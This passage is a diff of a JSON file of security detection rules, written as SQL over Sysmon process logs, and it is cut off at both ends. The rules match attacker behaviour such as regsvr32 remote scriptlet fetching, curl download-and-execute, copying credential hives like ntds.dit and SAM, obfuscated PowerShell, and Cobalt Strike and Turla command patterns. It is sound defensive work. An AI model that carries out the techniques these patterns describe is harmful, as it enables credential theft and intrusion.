CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_http_pattern.yml" + "filename": "proc_creation_win_schtasks_delete.yml" }, { - "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", - "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", - "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths using wmic. 
Often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Commands May 2020", + "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "status": "test", + "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1047" + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" + "filename": "proc_creation_win_apt_turla_comrat_may20.yml" }, { - "title": "Sysmon Driver Unloaded Via Fltmc.EXE", - "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", - "status": "test", - "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", - "author": "Kirill Kiryanov, oscd.community", + "title": "Rundll32 UNC Path Execution", + "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "status": "experimental", + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070", - 
"attack.t1562", - "attack.t1562.002" + "attack.execution", + "attack.t1021.002", + "attack.t1218.011" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" + "filename": "proc_creation_win_rundll32_unc_path.yml" }, { - "title": "Regsvr32 Flags Anomaly", - "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "title": "Copying Sensitive Files with Credential Data", + "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", "status": "test", - "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", - "author": "Florian Roth (Nextron Systems)", + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" ], "falsepositives": [ - "Unknown" + "Copying sensitive files for legitimate use (eg. 
backup) or forensic investigation by legitimate incident responder or forensic invetigator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" + "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" }, { - "title": "Suspicious PowerShell Parameter Substring", - "id": "36210e0d-5b19-485d-a087-c096088885f0", - "status": "test", - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "title": "Renamed PsExec Service Execution", + "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "status": "experimental", + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by 
legitimate administrators", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% 
-encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' 
ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'psexesvc.exe' AND NOT (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" + "filename": 
"proc_creation_win_renamed_sysinternals_psexec_service.yml" }, { - "title": "Suspicious File Download via CertOC.exe", - "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "status": "experimental", - "description": "Detects when a user downloads file by using CertOC.exe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Dridex Activity", + "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", + "status": "stable", + "description": "Detects potential Dridex acitvity via specific process patterns", + "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% 
view%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_lolbin_certoc_download.yml" + "filename": "proc_creation_win_malware_dridex.yml" }, { - "title": "Suspicious Schtasks From Env Var Folder", - "id": "81325ce1-be01-4250-944f-b4789644556f", - "status": "experimental", - "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", - "author": "Florian Roth (Nextron Systems)", + "title": "RDP Connection Allowed Via Netsh.EXE", + "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "status": "test", + "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", + "author": "Sander Wiebing", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE 
'%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_env_folder.yml" + "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" }, { - "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "07aa184a-870d-413d-893a-157f317f6f58", + "title": "PowerShell Base64 Encoded Invoke Keyword", + 
"id": "6385697e-9f1b-40bd-8817-f4a91f40508e", "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", + "author": "pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t", "tags": [ - "attack.discovery", "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_gather_network_info_execution.yml" + "filename": "proc_creation_win_powershell_base64_invoke.yml" }, { - "title": "Suspicious RazerInstaller Explorer Subprocess", - "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", - "status": "test", - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to 
escalate privileges to LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", + "title": "Suspect Svchost Activity", + "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "status": "experimental", + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "author": "David Burkett, @signalblur", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1553" + "attack.t1055" ], "falsepositives": [ - "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (Image LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" ], - "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" }, { - "title": "Potential Meterpreter/CobaltStrike Activity", - "id": "15619216-e993-4721-b590-4c520615a67d", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "HackTool - Certify 
Execution", + "id": "762f2482-ff21-4970-8939-0aa317a886bb", + "status": "experimental", + "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Commandlines containing components like cmd accidentally", - "Jobs and services started with cmd" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Certify.exe' ESCAPE '\\' OR OriginalFileName = 'Certify.exe' OR Description LIKE '%Certify%' ESCAPE '\\') OR ((CommandLine LIKE '%.exe cas %' ESCAPE '\\' OR CommandLine LIKE '%.exe find %' ESCAPE '\\' OR CommandLine LIKE '%.exe pkiobjects %' ESCAPE '\\' OR CommandLine LIKE '%.exe request %' ESCAPE '\\' OR CommandLine LIKE '%.exe download %' ESCAPE '\\') AND (CommandLine LIKE '% /vulnerable%' ESCAPE '\\' OR CommandLine LIKE '% /template:%' ESCAPE '\\' OR CommandLine LIKE '% /altname:%' ESCAPE '\\' OR CommandLine LIKE '% /domain:%' ESCAPE '\\' OR CommandLine LIKE '% /path:%' ESCAPE '\\' OR CommandLine LIKE '% /ca:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" 
+ "filename": "proc_creation_win_hktl_certify.yml" }, { - "title": "CobaltStrike Load by Rundll32", - "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", + "title": "Curl Download And Execute Combination", + "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", "status": "test", - "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", - "author": "Wojciech Lesicki", + "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", + "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" ], - "filename": 